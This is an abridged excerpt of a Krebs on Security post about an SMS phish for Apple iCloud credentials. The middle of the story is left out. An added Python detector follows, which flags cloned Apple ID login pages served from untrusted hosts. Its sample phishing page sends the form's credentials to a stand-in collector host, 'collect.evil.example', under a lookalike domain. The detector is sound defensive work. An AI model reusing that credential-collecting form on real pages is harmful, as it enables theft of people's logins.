Hacking Back (krebsonsecurity.com)
Recently, I heard from a security professional whose close friend received a targeted attempt to phish his Apple iCloud credentials. The phishing attack came several months after the friend’s child lost his phone at a public park in Virginia. The phish arrived via text message and claimed to have been sent from Apple. It said the device tied to his son’s phone number had been found, and that its precise location could be seen for the next 24 hours by clicking a link embedded in the text message.
That security professional source — referred to as “John” for simplicity’s sake — declined to be named or credited in this story because some of the actions he took to gain the knowledge presented here may run afoul of U.S. computer fraud and abuse laws.
Vindication is sweet, but the actions that “John” took would, of course, be impossible for most people. Even identifying a suspicious site can be difficult, especially as websites continue to coalesce around a handful of shared design motifs that are easy to replicate. So long as we rely upon passwords, phishing will continue to be a common and reasonably successful method for criminals to steal login credentials.
Perhaps it would be possible for Safari to automatically identify suspected phishing sites by comparing samples of the source code with known Apple ID login pages. Or, maybe Safari could alert users who use the same login details as their Apple ID on an insecure site.
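As an added illustration of the first idea above (comparing a page's source with known Apple ID login pages), here is a small defensive detector that is not part of the original post and not Apple's or Safari's code. It reduces HTML to its structure (tag names, attribute names and visible words, dropping attribute values so that rewritten form actions and links do not hide a copy), scores shingle similarity against a reference login page, and flags a near-identical page served from a host outside an allow-list. The reference markup, the allow-list of hosts and the sample phishing page are all constructed for this example.

```python
import re
from urllib.parse import urlsplit

# Constructed stand-in for a known-good Apple ID sign-in page. It is not
# Apple's real markup; it only supplies a structure to compare against.
REFERENCE_HTML = """
<html><head><title>Sign in with your Apple ID</title></head>
<body><form action="/signin" method="post">
<label for="account">Apple ID</label>
<input id="account" name="account" type="text" autocomplete="username">
<label for="password">Password</label>
<input id="password" name="password" type="password">
<button type="submit">Sign In</button>
<a href="/forgot">Forgot Apple ID or password?</a>
</form></body></html>
"""

# Assumed allow-list of hosts permitted to serve the reference page. A real
# browser feature would ship a curated list; this one is for the example.
TRUSTED_HOSTS = {"appleid.apple.com", "idmsa.apple.com"}

# Constructed phishing copy: same markup, form action pointed at the
# phisher's collector and a tracking script added. The host is a lookalike.
PHISH_URL = "https://appleid.apple.com.evil.example/found-device"
PHISH_HTML = REFERENCE_HTML.replace(
    'action="/signin"', 'action="https://collect.evil.example/creds"'
).replace("</form></body>", '</form><script src="/t.js"></script></body>')


def structural_tokens(html):
    """Reduce HTML to tag names, attribute names and visible words.
    Attribute values (URLs, ids, classes) are dropped on purpose: a cloned
    page whose links were rewritten still yields the same token stream."""
    tokens = []
    for m in re.finditer(r"<\s*(/?)\s*([a-zA-Z0-9]+)([^>]*)>|([^<]+)", html):
        closing, tag, attrs, text = m.groups()
        if tag:
            tokens.append(("/" if closing else "") + tag.lower())
            tokens.extend(a.lower() for a in re.findall(r"([a-zA-Z-]+)\s*=", attrs or ""))
        elif text:
            tokens.extend(w.lower() for w in re.findall(r"[A-Za-z]+", text))
    return tokens


def shingles(tokens, k=3):
    """Set of k-token windows; Jaccard over these tolerates small edits."""
    return {tuple(tokens[i:i + k]) for i in range(len(tokens) - k + 1)}


def similarity(html_a, html_b, k=3):
    a = shingles(structural_tokens(html_a), k)
    b = shingles(structural_tokens(html_b), k)
    if not a and not b:
        return 1.0
    return len(a & b) / len(a | b)


def host_is_trusted(url):
    """Exact or proper-subdomain match only, so that
    'appleid.apple.com.evil.example' does not pass as apple.com."""
    host = (urlsplit(url).hostname or "").lower()
    return any(host == t or host.endswith("." + t) for t in TRUSTED_HOSTS)


def assess(url, html, threshold=0.8):
    """Return a verdict: a page that closely matches the reference but is
    served from an untrusted host is a suspected credential phish."""
    score = similarity(html, REFERENCE_HTML)
    if score >= threshold and not host_is_trusted(url):
        verdict = "suspected-phish"
    elif score >= threshold:
        verdict = "legitimate-login"
    else:
        verdict = "unrelated"
    return {"url": url, "similarity": round(score, 3), "verdict": verdict}


if __name__ == "__main__":
    print(assess("https://appleid.apple.com/", REFERENCE_HTML))
    print(assess(PHISH_URL, PHISH_HTML))
    print(assess("https://news.example/", "<html><body><h1>Weather</h1><p>Sunny today</p></body></html>"))
```

The threshold and shingle size are tuning knobs: a lower threshold catches more heavily edited clones at the cost of false positives on unrelated login forms, which is why the host check is combined with the similarity score rather than either signal being used alone.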